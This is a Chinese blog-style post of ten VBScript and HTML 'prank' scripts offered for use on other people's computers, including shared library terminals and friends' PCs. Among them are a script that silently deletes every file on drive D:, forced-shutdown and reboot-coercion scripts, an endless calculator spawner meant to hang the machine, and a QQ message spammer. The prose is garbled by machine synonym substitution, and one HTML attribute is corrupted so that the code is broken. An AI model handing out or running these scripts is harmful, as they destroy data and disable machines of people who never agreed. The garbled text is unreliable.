【代碼一】
你打開老友的聊天對話框,然跋文下在你QQ里老友的昵稱,把下面代碼里的xx替代一下,就可以自界說發送QQ信息到老友的次數(代碼里的數字10改一下即可)。
代碼如下:
On Error Resume Next
Dim wsh,ye
set wsh=createobject("wscript.shell")
for i=1 to 10
wscript.sleep 700
wsh.AppActivate("與 xx 聊天中")
wsh.sendKeys "^v"
wsh.sendKeys i
wsh.sendKeys "%s"
next
wscript.quit
【代碼二】
我就用這個程序放在黌舍藏書樓查詢書刊的機械上,很多多少人都拿它沒法子。
do
msgbox "You are foolish!"
loop
【代碼三】
打開無數個計較器,直到死機。
set wsh=createobject("wscript.shell")
do
wsh.run "calc"
loop
【代碼四】
直接關機。
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "shutdown -f -s -t 00",0 ,true
【代碼五】
刪除D:\所有文件。
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true
【代碼六】
不竭彈出窗口
while(1)
msgbox "哈哈 你被耍了!"
loop
【代碼七】
不竭按下alt+f4(開什么都封閉)。
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
while(1)
WSHshell.SendKeys "%{F4}"
loop
【代碼八】
按500次回車 (以上代碼在運行者的電腦上顯示500個對話框。此中 do until s=500 ,500可以隨意更改)。
dim s
do until s=500
s=s+1
msgbox "哥們,給我按500次回車吧",64
loop
【代碼九】
若是把他發給你的QQ老友 他不懂的話 若是不輸我是豬 電腦就會在你設心猿意馬的
時候內關機 我設置的是3分鐘 只要輸入就解除了 當然若是不輸的話也有解除的法子。代碼如下:
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 180 -c ""說我是豬,不說我是豬就一分鐘關機,不信,試下···"" ",0 ,true
dim a
do while(a <> "我是豬")
a = inputbox ("說我是豬,就不關機,快撒,說 ""我是豬"" ","說不說","",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + "早說就行了嘛"
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,好乖"
【代碼十】
網頁整人結果代碼,想看結果,只要復制這下面的所有代碼保留在text文件里,點竄文件后綴為txt就能看到結果了。
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>網頁特效|Linkweb.cn/Js|---很惡心的常見整人結果</title>
</head>
<body>
<a href="" onMou搜索引擎優化ver="alert('為什么把鼠標放到這里?');
alert('我不是說過不成以這樣嗎?');
alert('你把我的話當什么了?');
alert('你知道錯了嗎?');
alert('什么?你居然....');
alert('居然還沒意識到本身做錯了?');
alert('那好,你要為此支出價格!');
alert('我要你在這里點足一千下......');
alert('什么?你起頭有點悔怨了?');
alert('何須呢?');
alert('你當初干什么去了?');
alert('不原諒你!');
alert('好從此刻起頭再點995下......');
alert('你的手起頭累了嗎?');
alert('什么?你已經沒氣力了?');
alert('你一向在求我原諒你啊!');
alert('看來你是真的知道錯了!');
alert('下次你還會這么做嗎?');
alert('真的不會了?');
alert('那好,今天就放你一馬!');
alert('寫封信給我說聲對不起!');
alert('你能這么做我很歡快!!!');
document.bgColor='black';
document.fgColor='White';
window.location.href='mailto:mygod@god?subject=對不起,下次不敢了!';">不許把鼠標移到這里</a>
</body>
</html>
0 篇文章
如果覺得我的文章對您有用,請隨意打賞。你的支持將鼓勵我繼續創作!